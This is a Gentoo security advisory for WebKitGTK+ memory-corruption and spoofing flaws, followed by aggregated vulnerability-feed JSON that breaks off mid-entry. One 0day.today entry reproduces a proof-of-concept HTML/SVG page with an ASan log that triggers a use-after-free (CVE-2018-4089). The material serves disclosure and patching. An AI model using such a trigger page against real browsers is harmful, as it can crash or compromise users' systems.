### Background
WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers.
### Description
Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details.
### Impact
An attacker could execute arbitrary commands via maliciously crafted web content.
### Workaround
There is no known workaround at this time.
### Resolution
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.18.6"
{"mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "The webkit2 package has been updated to version 2.18.6, fixing several security issues and other bugs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-27T09:19:00", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2018-01-27T09:19:00", "id": "MGASA-2018-0102", "href": "https://advisories.mageia.org/MGASA-2018-0102.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-14T17:48:24", "description": "WebKitGTK+ versions 2.18.x suffer from various memory corruption, user interface spoofing, and code execution vulnerabilities.", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "WebKitGTK+ Memory Corruption / Spoofing / Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4089", "CVE-2017-13885"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29634", "href": "https://0day.today/exploit/description/29634", "sourceData": "WebKitGTK+ Memory Corruption / Spoofing / Code Execution Vulnerabilities\r\n\r\nAdvisory URL : https://webkitgtk.org/security/WSA-2018-0002.html\r\nCVE identifiers : CVE-2018-4088, CVE-2018-4089, CVE-2018-4096,\r\n CVE-2017-7153, CVE-2017-7160, CVE-2017-7161,\r\n CVE-2017-7165, CVE-2017-13884, CVE-2017-13885.\r\n\r\nSeveral vulnerabilities were discovered in WebKitGTK+.\r\n\r\nCVE-2018-4088\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Jeonghoon Shin of Theori.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2018-4089\r\n Versions affected: WebKitGTK+ before 2.18.4.\r\n Credit to Ivan Fratric of Google Project Zero.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2018-4096\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to OSS-Fuzz.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-7153\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Jerry Decime.\r\n Impact: Visiting a malicious website may lead to user interface\r\n spoofing. Description: Redirect responses to 401 Unauthorized may\r\n allow a malicious website to incorrectly display the lock icon on\r\n mixed content. This issue was addressed through improved URL display\r\n logic.\r\n\r\nCVE-2017-7160\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Richard Zhu (fluorescence) working with Trend Micro's Zero\r\n Day Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-7161\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Mitin Svyat.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: A command injection issue\r\n existed in Web Inspector. This issue was addressed through improved\r\n escaping of special characters.\r\n\r\nCVE-2017-7165\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-13884\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-13885\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\n\r\nWe recommend updating to the last stable version of WebKitGTK+. It is\r\nthe best way of ensuring that you are running a safe version of\r\nWebKitGTK+. Please check our website for information about the last\r\nstable releases.\r\n\r\nFurther information about WebKitGTK+ Security Advisories can be found\r\nat: https://webkitgtk.org/security.html\r\n\r\nThe WebKitGTK+ team,\r\nJanuary 24, 2018\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29634", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-14T17:48:39", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2018-02-01T00:00:00", "type": "zdt", "title": "WebKit - detachWrapper Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4089"], "modified": "2018-02-01T00:00:00", "id": "1337DAY-ID-29683", "href": "https://0day.today/exploit/description/29683", "sourceData": "<!--\r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of Revision 225572 on OSX.\r\n \r\nThe PoC is attached.\r\n \r\nPreliminary Analysis:\r\n \r\nSVGPropertyTearOff keeps a pointer to a SVG property in m_value. When detachWrapper() is called, that pointer gets dereferenced and the value copied. This comment explains when/why this is used\r\nhttps://github.com/WebKit/webkit/blob/5277f6fb92b0c03958265d24a7692142f7bdeaf8/Source/WebCore/svg/properties/SVGPropertyTearOff.h#L105\r\nSVGPropertyTearOff keeps track of just a single value. In case the SVG property is actually a list of values, the values are stored in a Vector and SVGPropertyTearOff will keep a pointer to somewhere inside the vector's buffer. If a vector gets resized before detachWrapper() is called and the vector's buffer gets realloc()'ed, SVGPropertyTearOff's m_value will point to freed memory.\r\n \r\n \r\nASan log:\r\n \r\n=================================================================\r\n==50494==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000dccc0 at pc 0x0001262c1ba0 bp 0x7ffeee3a0460 sp 0x7ffeee3a0458\r\nREAD of size 8 at 0x60c0000dccc0 thread T0\r\n==50494==WARNING: invalid path to external symbolizer!\r\n==50494==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x1262c1b9f in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f)\r\n #1 0x1263e58ba in WebCore::SVGListProperty<WebCore::SVGLengthListValues>::detachListWrappersAndResize(WTF::Vector<WebCore::SVGLength*, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11068ba)\r\n #2 0x12899fc77 in void WebCore::SVGAnimatedTypeAnimator::executeAction<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WebCore::SVGAnimatedTypeAnimator::AnimationAction, WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, unsigned int, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c0c77)\r\n #3 0x128985a0e in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a6a0e)\r\n #4 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)\r\n #5 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)\r\n #6 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)\r\n #7 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)\r\n #8 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)\r\n #9 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)\r\n #10 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)\r\n #11 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)\r\n #12 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)\r\n #13 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)\r\n #14 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)\r\n #15 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)\r\n #16 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)\r\n #17 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)\r\n #18 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)\r\n #19 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)\r\n #20 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)\r\n #21 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)\r\n #22 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)\r\n #23 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)\r\n #24 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)\r\n \r\n0x60c0000dccc0 is located 0 bytes inside of 128-byte region [0x60c0000dccc0,0x60c0000dcd40)\r\nfreed by thread T0 here:\r\n #0 0x1239d4fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)\r\n #1 0x1358554b0 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb4b0)\r\n #2 0x1263e6350 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::shrinkCapacity(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1107350)\r\n #3 0x126972f81 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::operator=(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1693f81)\r\n #4 0x1289a03cd in WebCore::SVGLengthListValues::operator=(WebCore::SVGLengthListValues const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c13cd)\r\n #5 0x12899806d in void WebCore::SVGAnimatedTypeAnimator::resetFromBaseValue<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, WebCore::SVGAnimatedType&, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType& (WebCore::SVGAnimatedType::*)()) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b906d)\r\n #6 0x1289859d8 in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a69d8)\r\n #7 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)\r\n #8 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)\r\n #9 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)\r\n #10 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)\r\n #11 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)\r\n #12 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)\r\n #13 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)\r\n #14 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)\r\n #15 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)\r\n #16 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)\r\n #17 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)\r\n #18 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)\r\n #19 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)\r\n #20 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)\r\n #21 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)\r\n #22 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)\r\n #23 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)\r\n #24 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)\r\n #25 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)\r\n #26 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)\r\n #27 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x1239d4a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)\r\n #1 0x7fff65ff5200 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2200)\r\n #2 0x135855944 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb944)\r\n #3 0x135853bdd in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fc9bdd)\r\n #4 0x1357c045b in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3645b)\r\n #5 0x1357bf90a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3590a)\r\n #6 0x1252e5ed8 in WTF::FastMalloc::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6ed8)\r\n #7 0x1263e65f0 in WTF::VectorBufferBase<WebCore::SVGLengthValue, WTF::FastMalloc>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11075f0)\r\n #8 0x126973640 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::Vector(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1694640)\r\n #9 0x128998d47 in bool WebCore::SVGAnimationElement::adjustFromToListValues<WebCore::SVGLengthListValues>(WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues&, float, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b9d47)\r\n #10 0x1289985bf in WebCore::SVGAnimatedLengthListAnimator::calculateAnimatedValue(float, unsigned int, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b95bf)\r\n #11 0x128984d78 in WebCore::SVGAnimateElementBase::calculateAnimatedValue(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a5d78)\r\n #12 0x1289ae9cb in WebCore::SVGAnimationElement::updateAnimation(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36cf9cb)\r\n #13 0x128afad65 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bd65)\r\n #14 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)\r\n #15 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)\r\n #16 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)\r\n #17 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)\r\n #18 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)\r\n #19 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)\r\n #20 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)\r\n #21 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)\r\n #22 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)\r\n #23 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)\r\n #24 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)\r\n #25 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)\r\n #26 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)\r\n #27 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)\r\n #28 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)\r\n #29 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f) in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper()\r\nShadow bytes around the buggy address:\r\n 0x1c180001b940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c180001b950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c180001b960: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x1c180001b970: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c180001b980: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c180001b990: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd\r\n 0x1c180001b9a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c180001b9b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c180001b9c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x1c180001b9d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c180001b9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==50494==ABORTING\r\n-->\r\n \r\n<script>\r\nfunction eventhandler1() {\r\nvar x = svgvar00003.x.animVal.getItem(0);\r\nsvgvar00020.beginElement();\r\n}\r\n</script>\r\n<svg>\r\n<text x=\"1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\" id=\"svgvar00003\">\r\n<set id=\"svgvar00020\" attributeName=\"x\" to=\"100\" onbegin=\"eventhandler1()\" />\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29683", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-08-19T12:33:40", "description": "The remote host is affected by the vulnerability described in GLSA-201803-11 (WebKitGTK+: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details.\n Impact :\n\n An attacker could execute arbitrary commands via maliciously crafted web content.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-03-22T00:00:00", "type": "nessus", "title": "GLSA-201803-11 : WebKitGTK+: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201803-11.NASL", "href": "https://www.tenable.com/plugins/nessus/108526", 